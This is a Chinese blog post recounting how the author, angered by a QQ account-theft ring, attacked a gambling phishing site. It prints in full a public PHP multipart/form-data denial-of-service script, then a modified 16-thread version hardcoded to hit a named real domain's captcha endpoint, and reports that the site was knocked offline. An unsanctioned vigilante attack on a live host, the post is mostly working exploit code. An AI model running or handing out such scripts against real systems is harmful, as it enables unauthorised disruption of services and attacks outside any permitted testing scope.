记一次搞某赌博钓鱼站经历

最近貌似有某盗号集团猖獗,班上好几个同学被盗了号,于是……

QQ20160607-0

班上有同学抱着好(zuo)奇(si)的心理,进群看了看,以下是聊(si)天(bi)记录:
QQ20160607-1
QQ20160607-2
QQ20160607-3

QQ20160607-4

一开始,我只想做个安静的美男子,直到这条消息出现了:
QQ20160607-5

向勇士要来了网址,打开一看,发现是一个“环球国际”网站注册页面。其实一开始,我是想用SQL注入的,查看HTML,发现对应输入表单有onkeyup事件,自动替换所有;’符号,遂删之,之后尝试输入特殊符号,无果。甚至当我删光网页上的js和css后仍无法输入(并不知道为什么)。只能放弃。

不过,用开发工具看了看响应头,倒是发现了有趣的东西:

11F2BA3C-5FAD-4351-8B89-D99499B7AF06

PHP-5.3.29!存在严重的POC漏洞。于是想起了以前在乌云知识库上一位大神的脚本:

'''
Author: Shusheng Liu,The Department of Security Cloud, Baidu
email: liusscs@163.com
'''
import sys
import urllib,urllib2
import datetime
from optparse import OptionParser

def http_proxy(proxy_url):

proxy_handler = urllib2.ProxyHandler({"http" : proxy_url})
null_proxy_handler = urllib2.ProxyHandler({})
opener = urllib2.build_opener(proxy_handler)
urllib2.install_opener(opener)
#end http_proxy

def check_php_multipartform_dos(url,post_body,headers):
req = urllib2.Request(url)
for key in headers.keys():
req.add_header(key,headers[key])
starttime = datetime.datetime.now();
fd = urllib2.urlopen(req,post_body)
html = fd.read()
endtime = datetime.datetime.now()
usetime=(endtime - starttime).seconds
if(usetime > 5):
result = url+" is vulnerable";
else:
if(usetime > 3):
result = "need to check normal respond time"
return [result,usetime]
#end

def main():
#http_proxy("http://127.0.0.1:8089")
parser = OptionParser()
parser.add_option("-t", "--target", action="store",
dest="target",
default=False,
type="string",
help="test target")
(options, args) = parser.parse_args()
if(options.target):
target = options.target
else:
return;

Num=350000
headers={'Content-Type':'multipart/form-data; boundary=----WebKitFormBoundaryX3B7rDMPcQlzmJE1',
'Accept-Encoding':'gzip, deflate',
'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36'}
body = "------WebKitFormBoundaryX3B7rDMPcQlzmJE1\nContent-Disposition: form-data; name=\"file\"; filename=sp.jpg"
payload=""
for i in range(0,Num):
payload = payload + "a\n"
body = body + payload;
body = body + "Content-Type: application/octet-stream\r\n\r\ndatadata\r\n------WebKitFormBoundaryX3B7rDMPcQlzmJE1--"
print "starting...";
respond=check_php_multipartform_dos(target,body,headers)
print "Result : "
print respond[0]
print "Respond time : "+str(respond[1]) + " seconds";

if __name__=="__main__":
main()

尝试直接使用,效果不明显(虽然这个脚本150s才结束.),于是稍作修改,加入多线程:

'''
Author: Shusheng Liu,The Department of Security Cloud, Baidu
email: liusscs@163.com
'''

import urllib, urllib2
import datetime
import time
from optparse import OptionParser
import threading

def http_proxy(proxy_url):
proxy_handler = urllib2.ProxyHandler({"http": proxy_url})
null_proxy_handler = urllib2.ProxyHandler({})
opener = urllib2.build_opener(proxy_handler)
urllib2.install_opener(opener)

# end http_proxy

def check_php_multipartform_dos(url, post_body, headers):
req = urllib2.Request(url)
for key in headers.keys():
req.add_header(key, headers[key])
starttime = datetime.datetime.now();
fd = urllib2.urlopen(req, post_body)
html = fd.read()
endtime = datetime.datetime.now()
usetime = (endtime - starttime).seconds
if (usetime > 5):
result = url + " is vulnerable";
else:
if (usetime > 3):
result = "need to check normal respond time"
return [result, usetime]

# end

def main():
# http_proxy("http://127.0.0.1:8089")

Num = 350000
headers = {'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryX3B7rDMPcQlzmJE1',
'Accept-Encoding': 'gzip, deflate',
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36'}
body = "------WebKitFormBoundaryX3B7rDMPcQlzmJE1\nContent-Disposition: form-data; name=\"file\"; filename=sp.jpg"
payload = ""
for i in range(0, Num):
payload = payload + "a\nb\n"
body = body + payload;
body = body + "Content-Type: application/octet-stream\r\n\r\ndatadata\r\n------WebKitFormBoundaryX3B7rDMPcQlzmJE1--"
print "starting...";
respond = check_php_multipartform_dos('http://vip1.huanqiugj.com/index.php/user/vcode/{time}'.format(time=int(time.time())), body, headers)
print "Result : "
print respond[0]
print "Respond time : " + str(respond[1]) + " seconds";

class mythread(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
def run(self):
main()
if __name__ == "__main__":
L=[]
for i in range(16):
L.append(mythread())
for i in L:
i.start()

请求目标为验证码生成页面,应该效果会比请求注册页面更好。

开八线程时目标网站已经需要数十s才能打开,16线程彻底搞死。

END.